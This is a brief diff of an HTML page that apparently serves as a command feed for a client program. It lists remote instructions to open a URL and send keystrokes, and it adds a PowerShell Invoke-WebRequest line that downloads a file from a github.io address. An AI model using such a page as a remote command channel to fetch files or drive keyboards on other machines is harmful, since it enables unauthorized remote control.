--- a/github_website.html
+++ b/github_website.html
@@ -5,7 +5,7 @@
     <title></title>
 </head>
 <body>
-    <p>cmd: start www.google.com///keyboard:a,h,o,j,Key.enter,///</p>
+    <p>cmd: start www.google.com///keyboard:a,h,o,j,Key.enter,///cmd:Invoke-WebRequest 'https://nugewizard.github.io/web-test/1.jpg' -OutFile test.jpg///</p>
     <a href="1.jpg">fotka</a>
 </body>
 </html>
